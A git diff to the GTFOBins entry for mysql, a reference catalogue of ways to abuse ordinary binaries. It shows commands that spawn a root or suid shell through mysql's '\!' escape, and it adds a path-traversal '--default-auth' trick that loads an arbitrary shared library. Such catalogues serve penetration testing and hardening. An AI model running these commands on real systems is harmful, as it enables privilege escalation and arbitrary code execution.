diff --git a/_gtfobins/mysql.md b/_gtfobins/mysql.md index 533dea4..e523c5f 100644 --- a/_gtfobins/mysql.md +++ b/_gtfobins/mysql.md @@ -7,4 +7,10 @@ functions: - code: sudo mysql -e '\! /bin/sh' limited-suid: - code: ./mysql -e '\! /bin/sh' + library-load: + - description: | + A MySQL server must accept connections in order for this to work. + + The following loads the `/path/to/lib.so` shared object. + code: mysql --default-auth ../../../../../path/to/lib ---